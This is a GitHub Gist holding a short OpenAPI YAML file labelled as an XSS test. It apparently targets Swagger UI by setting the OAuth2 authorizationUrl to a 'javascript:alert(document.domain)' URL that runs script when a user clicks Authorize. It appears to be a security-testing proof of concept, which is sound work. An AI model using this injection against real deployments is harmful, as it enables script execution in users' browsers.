Created
August 24, 2021 10:33
-
-
Save lorthirk/b6cb6b6d6554f5a38530a77a46074d05 to your computer and use it in GitHub Desktop.
openapi.yaml XSS test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openapi: 3.0.0 | |
| components: | |
| securitySchemes: | |
| OAuth2: | |
| type: oauth2 | |
| flows: | |
| authorizationCode: | |
| authorizationUrl: javascript:alert(document.domain)// | |
| tokenUrl: https://example.com/oauth/token | |
| scopes: | |
| read: Grants read access | |
| write: Grants write access | |
| admin: Grants access to admin operations | |
| info: | |
| version: "0.0.1" | |
| title: Swagger UI | |
| description: Please Authorize! | |
| paths: | |
| /: | |
| get: | |
| responses: | |
| 200: | |
| description: Successful response |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment